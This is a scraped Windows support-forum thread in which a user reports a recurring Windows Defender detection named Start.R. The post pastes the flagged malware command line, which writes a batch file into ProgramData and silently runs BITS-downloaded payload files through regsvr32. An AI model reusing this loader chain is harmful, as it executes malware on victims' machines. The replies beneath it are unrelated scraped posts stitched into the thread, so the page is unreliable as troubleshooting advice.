Windows 10: Major HeadAche

Discus and support Major HeadAche in AntiVirus, Firewalls and System Security to solve the problem; So From Last Week I am having a problem. When ever I start pc my win defender shows virus detected I check and find its name Start.R and These are the... Discussion in 'AntiVirus, Firewalls and System Security' started by RashidAliHassan, Aug 8, 2018.

1. Major HeadAche

So From Last Week I am having a problem.

When ever I start pc my win defender shows virus detected I check and find its name Start.R and These are the details

CmdLine: \Device\HarddiskVolume2\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\61b5986c-0751-0\x.bat" & echo bitsadmin /complete 61b5986c-0751-0 ^> nul >> "C:\ProgramData\61b5986c-0751-0\x.bat" & echo bitsadmin /cancel 61b5986c-0751-0 ^> nul >> "C:\ProgramData\61b5986c-0751-0\x.bat" & echo if exist "C:\ProgramData\61b5986c-0751-0\61b5986c-0751-0.d" goto q >> "C:\ProgramData\61b5986c-0751-0\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\61b5986c-0751-0\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=6b23115361b5986c " "C:\ProgramData\61b5986c-0751-0\%i" >> "C:\ProgramData\61b5986c-0751-0\x.bat")) > nul & echo :q >> "C:\ProgramData\61b5986c-0751-0\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=6b23115361b5986c " "C:\ProgramData\61b5986c-0751-0\61b5986c-0751-0.d" >> "C:\ProgramData\61b5986c-0751-0\x.bat" & echo del "C:\ProgramData\61b5986c-0751-0\x.bat" ^& exit >> "C:\ProgramData\61b5986c-0751-0\x.bat" & "C:\ProgramData\61b5986c-0751-0\x.bat""

I have tried most of the things like custom or full virus scans but nothing is fount please help.

:)

RashidAliHassan, Aug 8, 2018
  2. Drone Win User

Space images thread

Major HeadAche [​IMG]

• Evidence that some early supermassive black holes formed directly from the collapse of a gas cloud has been found.
    • These results could represent a major step in the understanding of how the Universe's first giant black holes formed.
    • Two candidate black hole "seeds" have been identified, possibly at < 1 billion years after the Big Bang.
    • Astronomers combined data from Chandra, Hubble, and Spitzer to make this discovery.

Drone, Aug 8, 2018
  3. kruk Win User
    AMD Readies B2 Stepping of the Ryzen "Summit Ridge" Silicon

I'm not apologizing, I'm just reacting to FUD. Please list me 3 major bugs that affect my Ryzen build. I'm dying to know ...

Also, another rumor that denies the stepping has popped up: Ryzen "B2" Stepping a False Rumor (apparently)

kruk, Aug 8, 2018
  4. vexen Win User

Major HeadAche

Good file hosting/uploading site?

http://en.wikipedia.org/wiki/Comparison_of_file_hosting_services

Take a look at this list maybe...

However, if you're somewhat serious about these videos, and a price like 5-10$ is something you can afford, I'd suggest that you invest it and save yourself a headache. Good and free doesn't rhyme these days. It's hard to find a service that offers the bandwidth and the speed, free.

vexen, Aug 8, 2018
Thema:

Major HeadAche

1. Major HeadAche - Similar Threads - Major HeadAche

2. Windows 11 Causing Major Audio Issues

in Windows 10 Gaming
    Windows 11 Causing Major Audio Issues: I am currently running Windows 11 on my HP laptop. However, ever since I installed Windows 11 automatically, when I try to shut down and update my PC, I have experienced significant audio issues. I have never encountered this problem with Windows 10, which I used for years...
  3. Windows 11 Causing Major Audio Issues

in Windows 10 Software and Apps
    Windows 11 Causing Major Audio Issues: I am currently running Windows 11 on my HP laptop. However, ever since I installed Windows 11 automatically, when I try to shut down and update my PC, I have experienced significant audio issues. I have never encountered this problem with Windows 10, which I used for years...
  4. Major problem with Wondershare Filmora update HELP!!!!

in Windows 10 Gaming
    Major problem with Wondershare Filmora update HELP!!!!: I was almost finished editing a feature-length student film and the Wondershare app updated...completely wrecking my project. I'm supposed to show it on Saturday and the customer service seems like a total scam, sending me in circles on the site, in the chat, and on the...
  5. Major problem with Wondershare Filmora update HELP!!!!

Major problem with Wondershare Filmora update HELP!!!!: I was almost finished editing a feature-length student film and the Wondershare app updated...completely wrecking my project. I'm supposed to show it on Saturday and the customer service seems like a total scam, sending me in circles on the site, in the chat, and on the...
  6. Major problem with Wondershare Filmora update HELP!!!!

in Windows 10 BSOD Crashes and Debugging
  7. Is there any major requirement or reason to enable IPV6

in Windows 10 Gaming
    Is there any major requirement or reason to enable IPV6: I have disabled IPV6 in my network adaptor properties. What practical uses does it have in my home network? I don't see any ill effects of having it disabled. One thing I noticed, having it disabled allows my computer names to be displayed in both File Manager's Network...
  8. Is there any major requirement or reason to enable IPV6

Is there any major requirement or reason to enable IPV6: I have disabled IPV6 in my network adaptor properties. What practical uses does it have in my home network? I don't see any ill effects of having it disabled. One thing I noticed, having it disabled allows my computer names to be displayed in both File Manager's Network...
  9. Major headaches with Windows 10 1903

in Windows 10 Network and Sharing
    Major headaches with Windows 10 1903: I think that MS made major mistakes in Windows 10 1903. My Outlook has twice lost all my emails, requiring an hour or so to rebuild them, and 3 times lost all my formatting in Layout as well as my signature. File Explorer is separating files by today, this week, this month,...
  10. Latest Windows update causing major headache with my staff laptops and my domain!

in Windows 10 Installation and Upgrade
    Latest Windows update causing major headache with my staff laptops and my domain!: 2/12/2019. I come into work this morning and am hit with 8 staff members who cannnot use their laptop after Windows update!! After login, screen is dark blue with nothing but a flashing task bar. Hours of frustration, nothing that I do works. SO tired of Microsoft and their...